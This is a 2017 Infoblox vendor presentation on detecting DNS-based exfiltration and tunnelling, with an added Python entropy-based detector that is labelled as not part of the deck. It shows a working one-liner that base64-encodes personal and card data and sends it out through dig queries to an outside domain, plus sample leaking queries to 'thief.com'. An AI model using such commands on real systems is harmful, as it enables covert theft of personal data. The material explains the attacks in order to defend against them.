© 2017 Infoblox Inc. All Rights Reserved.
How to Secure Your Data From DNS based Exfiltration
Philip Parker, Vadim Pavlov
Who are we?
Philip Parker
Vadim Pavlov
Agenda
What the Bad Guys are After and Why
PII (Personally Identifiable Information): information like social security numbers of employees or customers that cybercriminals can use to steal identity, or sell in the underground market for profit
Regulated Data: data related to PCI DSS and HIPAA compliance that can be misused
Other Sensitive Information: credit card numbers, company financials, payroll and emails, and denying access to this and other data (Ransomware)
Average consolidated cost of a data breach: $4M [3]
A recent high-profile data breach is likely to cost more than $100M [4]
Data Exfiltration/Infiltration DNS Queries
• Sophisticated (zero-day)
• Infected endpoint gets access to a file containing sensitive data
• Attacker-controlled server (C&C): thief.com
Queries sent to the attacker's server:
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
DNS Exfiltration
Client request
$ echo " John/Smith/1234123412340987/94040 " | base64 | xargs -I '{}' dig {}.xn---d1asm.net
;; QUESTION SECTION:
;IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net. IN A
;; AUTHORITY SECTION:
xn---d1asm.net. 1800 IN SOA ns1.xn--d1asm.net. root.xn---d1asm.net. 201702301 3600 3600 3600 1800
DNS Infiltration
Client request
$ dig dnsmsg....xn---d1asm.net TXT
;; QUESTION SECTION:
;dnsmsg....xn---d1asm.net. IN TXT
Communications via DNS Tunneling
• Uses DNS as a covert communication channel to bypass Internet firewalls
• Attacker tunnels other protocols like SSH, or web within DNS
• SplitBrain
• Client-side DNS2TCP tunnel program
Infoblox ActiveTrust® Cloud
Traditional Network Security does not address Security Gap in DNS
Advanced DNS Threats vs Network Security Layers:
Security layer | Block zero-day data exfiltration & infiltration over DNS | Block advanced malware communications over DNS (e.g. DGA, Fast Flux) | Block DNS server attacks (e.g. NXDomain, Hijack)
Sandboxing (APT) | No | No | No
NGFW, IDS/IPS | No | No | No
DLP | No | No | No
ActiveTrust® Cloud—Functional Summary
Highly scalable protection for devices on-premises, roaming and in remote office/branch office
• Detect and contain malware using DNS
• Prevent DNS based data exfiltration that other systems can't detect
• Improved visibility and context
Components
ActiveTrust Cloud tightly integrates with on-premises DDI for enriched visibility and ecosystem integrations
ATC Workflow Scenarios
Encrypted DNS query, embeds Client ID and MAC
Connector
Threat Insight - Behavior Analytics with Machine Learning
Model features: Entropy, Size, Lexical Analysis, Frequency, N-Gram
Detects and prevents 0-day DNS based threats
Automatically adds destinations to RPZ feed and scales enforcement
Detects and prevents:
• DNS Tunneling
• Data Exfiltration/Infiltration
• DGA
• Fastflux
• DNS Messenger
How Behavior Analytics Works
Detects sophisticated data exfiltration techniques that don't have well-known signatures (zero day)
How DNS Threat Insight Works to Detect Data Exfiltration
Threat Insight analyzes based on queried domains
Malicious:
MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.joedomain.com
*.t.joedomain.com
NVWW2IDPOZQWY5DJNZSQ.t.joedomain.com
Normal:
www.google.com
Inca.Infoblox.com
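The entropy, size and frequency features named on the Threat Insight slide, applied to the malicious and normal names listed here, as an added defender-side example that is not part of the Infoblox deck or product: a toy per-zone scorer run over a constructed query log, with illustrative thresholds that are my own assumptions.

```python
import math
from collections import defaultdict

# Constructed query log ("client qname" per line): the deck's own example
# names plus a few ordinary lookups. The format is an assumption, not a real log.
SAMPLE_LOG = """\
10.0.0.5 MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.joedomain.com
10.0.0.5 NVWW2IDPOZQWY5DJNZSQ.t.joedomain.com
10.0.0.7 NameMarySmith.foo.thief.com
10.0.0.7 MRN100045429886.foo.thief.com
10.0.0.7 DOB10191952.foo.thief.com
10.0.0.9 www.google.com
10.0.0.9 mail.google.com
10.0.0.9 Inca.Infoblox.com
"""

def shannon_entropy(label: str) -> float:
    """Bits per character of a case-folded label (0.0 for a repeated letter)."""
    label = label.lower()
    n = len(label)
    if n == 0:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname: str):
    """Return (data_labels, zone); assumes a two-label registered domain."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])

def score_zones(log: str, ent_hi=3.5, len_hi=20, uniq_hi=3, bytes_hi=40):
    """Per registered domain: highest label entropy, longest label, bytes carried in
    subdomain labels and distinct subdomains; flag payload-like or chatty zones."""
    zones = defaultdict(lambda: {"max_ent": 0.0, "max_len": 0, "bytes": 0, "subs": set()})
    for line in filter(None, log.splitlines()):
        _client, qname = line.split()
        data, zone = split_qname(qname)
        z = zones[zone]
        z["subs"].add(".".join(data))
        z["bytes"] += sum(len(lab) for lab in data)
        for lab in data:
            z["max_ent"] = max(z["max_ent"], shannon_entropy(lab))
            z["max_len"] = max(z["max_len"], len(lab))
    for z in zones.values():  # thresholds are illustrative assumptions
        z["flagged"] = (z["max_ent"] >= ent_hi and z["max_len"] >= len_hi) or (
            len(z["subs"]) >= uniq_hi and z["bytes"] >= bytes_hi)
    return dict(zones)
```

Calling score_zones(SAMPLE_LOG) flags joedomain.com on the entropy and length of its base32-looking labels and thief.com on the number of distinct subdomains and bytes they carry, while google.com and infoblox.com stay clean; the real product also uses lexical and n-gram features that this toy omits.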
The Motion of Malware Through Networks
Malware uses DNS at every stage
Penetration/Infiltration: query malicious domains and report to C&C
Infection: download malware to the infected host
Ex/Infiltration: transport the data offsite
Demo